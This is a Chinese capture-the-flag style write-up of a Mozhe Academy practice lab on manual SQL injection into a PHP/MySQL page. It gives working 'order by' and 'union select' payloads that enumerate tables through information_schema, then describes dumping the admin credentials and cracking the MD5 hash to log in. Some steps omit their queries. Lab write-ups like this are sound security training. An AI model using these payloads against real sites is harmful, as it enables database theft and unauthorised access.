【墨者学院】SQL手工注入漏洞测试(MySQL数据库)

一、链接地址:SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

二、了解靶场,击败靶场

背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

三、解题步骤

1、启动靶场环境

2、点击访问 

3、查找到sql注入点在滚动窗口 ,点击打开

4、判断注入类型为数字型注入

5、判断出有4列,因为order by 5时页面无显示http://124.70.64.48:48206/new_list.php?id=1 order by 4 #

6、union select 联合查询判断回显位置

7、接下来查看表名,语句为:http://124.70.64.48:48206/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() #

 8、查询字段,也就是账号密码

8、使用查出的账号密码(密码需要使用MD5解密),登陆即可

1、MD5解密链接md5在线解密破解,md5解密加密

2、使用解密后的密码登陆、得到KEY

  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值